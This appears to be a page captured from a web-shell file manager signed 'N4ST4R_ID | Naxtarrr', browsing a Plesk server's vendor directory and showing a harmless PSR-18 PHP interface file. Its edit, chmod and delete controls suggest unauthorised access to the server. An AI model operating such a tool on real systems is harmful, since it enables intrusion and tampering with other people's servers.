Submit
Path:
~
/
/
opt
/
psa
/
admin
/
plib
/
vendor
/
psr
/
http-client
/
src
/
File Content:
ClientInterface.php
<?php namespace Psr\Http\Client; use Psr\Http\Message\RequestInterface; use Psr\Http\Message\ResponseInterface; interface ClientInterface { /** * Sends a PSR-7 request and returns a PSR-7 response. * * @param RequestInterface $request * * @return ResponseInterface * * @throws \Psr\Http\Client\ClientExceptionInterface If an error happens while processing the request. */ public function sendRequest(RequestInterface $request): ResponseInterface; }
Edit
Rename
Chmod
Delete
FILE
FOLDER
INFO
Name
Size
Permission
Action
ClientExceptionInterface.php
171 bytes
0644
ClientInterface.php
500 bytes
0644
NetworkExceptionInterface.php
658 bytes
0644
RequestExceptionInterface.php
586 bytes
0644
N4ST4R_ID | Naxtarrr